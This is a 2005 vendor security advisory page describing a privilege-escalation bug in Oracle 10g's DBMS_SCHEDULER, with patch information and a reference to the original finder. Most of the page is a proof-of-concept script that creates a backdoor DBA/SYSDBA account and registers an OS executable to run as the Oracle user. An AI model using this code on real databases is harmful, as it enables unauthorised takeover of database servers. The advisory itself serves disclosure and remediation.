Services
Information
Company |
Oracle 10g Exploit dbms_scheduler
Details The following proof of concept exploit code allows any user with CREATE JOB privileges to execute OS commands in the context of the user Oracle. Example #!/bin/ksh set -a echo "Operator, are you pondering what I am pondering? " >/dev/console ORAENV_ASK=NO ORACLE_SID= <sid> . /usr/local/bin/oraenv sqlplus "/ as sysdba " < <EOF create user brain identified by takeover default tablespace system; grant connect,resource,dba to brain; grant sysdba to brain; EOF BEGIN DBMS_SCHEDULER.CREATE_PROGRAM ( program_name = > 'take_over_the_world ', program_action = > '/tmp/pinky_and_the_brain ', program_type = > 'EXECUTABLE ', comments = > 'I rulez '); END; / Patch Information This bug is fixed after applying the patchset for Oracle alert 68 or later patchsets. References Pete Finnigan's Security Advisotry - Bug in dbms_scheduler © 2005 by Red-Database-Security GmbH - last update 02-nov-2005 |
Definition Exploit |